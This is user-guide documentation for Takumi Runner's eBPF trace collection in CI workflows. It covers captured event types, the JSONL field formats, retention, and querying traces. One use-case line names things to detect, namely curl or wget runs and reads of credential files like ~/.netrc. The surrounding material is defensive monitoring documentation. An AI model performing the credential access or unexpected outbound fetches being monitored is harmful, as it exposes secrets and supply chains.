Skip to main content

Trace Collection

info

The English user guide is currently in beta preview. Most of the documents have been automatically translated from the Japanese version. Should you find any inaccuracies, please reach out to Flatt Security.

Takumi Runner comprehensively captures process, network, and file operations that occur during workflow execution using eBPF. This page explains the types of events captured, the data format, and how to access raw data.

How It Works

Takumi Runner's trace collection is built on Linux kernel eBPF (extended Berkeley Packet Filter) technology. By using eBPF, activity inside the VM is captured at the kernel layer without any modifications to user code running within the workflow.

Captured Events

The Takumi Runner eBPF tracer records the following system call-level events:

Event TypeDescriptionRecorded Fields
process_execProcess executionPID, command name, file path, arguments
net_connectNetwork connectionPID, destination address, port, protocol
dns_queryDNS lookupPID, hostname
file_openFile openPID, path, flags
file_writeFile writePID, path, bytes written

A single job execution typically generates thousands to tens of thousands of events.

Use Cases

Collected traces can be used for the following types of security analysis:

  • Supply chain attack detection: Check whether suspicious outbound connections to unexpected hosts occurred during npm install or pip install
  • Incident investigation: Track whether curl or wget was executed during a specific job, or whether files containing credentials such as ~/.netrc were accessed
  • Baseline analysis: Compare traces from normal builds with traces from anomalous builds to identify differences

Data Format

Trace data is stored in JSONL (newline-delimited JSON) format. Each line corresponds to one event, and each line is an independent JSON object. All events include the common fields type (event type) and timestamp (occurrence time in ISO 8601 format).

warning

The field definitions shown below are reference information based on the current implementation. Fields may be added, changed, or removed without prior notice.

process_exec

Records process execution.

FieldTypeDescription
pidnumberProcess ID
commstringCommand name
filenamestringExecutable file path
argsstring[]Command-line arguments
{
"type": "process_exec",
"timestamp": "2025-01-15T10:30:01Z",
"pid": 1234,
"comm": "npm",
"filename": "/usr/bin/npm",
"args": ["npm", "install"]
}

net_connect

Records network connections.

FieldTypeDescription
pidnumberProcess ID
dst_addrstringDestination IP address
dst_portnumberDestination port number
protocolstringProtocol (tcp / udp)
{
"type": "net_connect",
"timestamp": "2025-01-15T10:30:02Z",
"pid": 1235,
"dst_addr": "104.16.23.35",
"dst_port": 443,
"protocol": "tcp"
}

dns_query

Records DNS lookups.

FieldTypeDescription
pidnumberProcess ID
hostnamestringQueried hostname
{
"type": "dns_query",
"timestamp": "2025-01-15T10:30:02Z",
"pid": 1235,
"hostname": "registry.npmjs.org"
}

file_open

Records file opens.

FieldTypeDescription
pidnumberProcess ID
pathstringFile path
flagsstringOpen flags (e.g. O_RDONLY)
{
"type": "file_open",
"timestamp": "2025-01-15T10:30:03Z",
"pid": 1235,
"path": "/home/runner/work/app/package.json",
"flags": "O_RDONLY"
}

file_write

Records file writes.

FieldTypeDescription
pidnumberProcess ID
pathstringFile path
bytesnumberBytes written
{
"type": "file_write",
"timestamp": "2025-01-15T10:30:04Z",
"pid": 1235,
"path": "/home/runner/work/app/node_modules/.package-lock.json",
"bytes": 2048
}

Retention Period

Trace data is retained for a minimum of 90 days from the date of collection. Trace data older than 90 days may be deleted.

When a subscription is cancelled, trace data is deleted in accordance with the terms of service.

info

If you would like to extend the retention period, please contact your account manager. Depending on your contract and usage, we may not be able to accommodate all requests.

Raw Data Access

The Query tab in the job detail view of the Shisho Cloud console lets you run arbitrary SQL (DuckDB) queries against the trace data.

Query tab

You can also download the trace data for each job execution as a JSONL file. Downloaded raw data can be freely analyzed with your own scripts and tools.

info

Raw data is in gzip-compressed JSONL format. Decompress with gunzip and process with tools like jq.

gunzip trace.jsonl.gz
cat trace.jsonl | jq 'select(.type == "net_connect")'